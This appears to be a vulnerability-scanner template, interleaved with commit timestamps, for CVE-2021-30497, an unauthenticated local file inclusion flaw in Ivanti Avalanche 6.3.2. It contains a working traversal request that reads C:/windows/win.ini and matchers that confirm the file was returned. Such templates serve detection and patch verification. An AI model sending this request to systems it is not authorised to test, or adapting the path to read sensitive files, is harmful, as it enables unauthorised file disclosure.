2021-07-11 09:31:18 +00:00
id : CVE-2021-30497
info :
2022-07-26 13:45:11 +00:00
name : Ivanti Avalanche 6.3.2 - Local File Inclusion
2021-07-11 09:31:18 +00:00
author : gy741
severity : high
2022-07-26 13:45:11 +00:00
description : Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.
2022-04-22 10:38:41 +00:00
reference :
- https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
2022-05-17 09:18:12 +00:00
- https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US
- https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm
2022-07-26 13:45:11 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30497
2022-04-29 06:44:52 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-05-17 09:18:12 +00:00
cvss-score : 7.5
2022-04-29 06:44:52 +00:00
cve-id : CVE-2021-30497
2022-07-26 13:45:11 +00:00
cwe-id : CWE-36
tags : cve,cve2021,avalanche,traversal,lfi
2021-07-11 09:31:18 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "for 16-bit app support"
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/14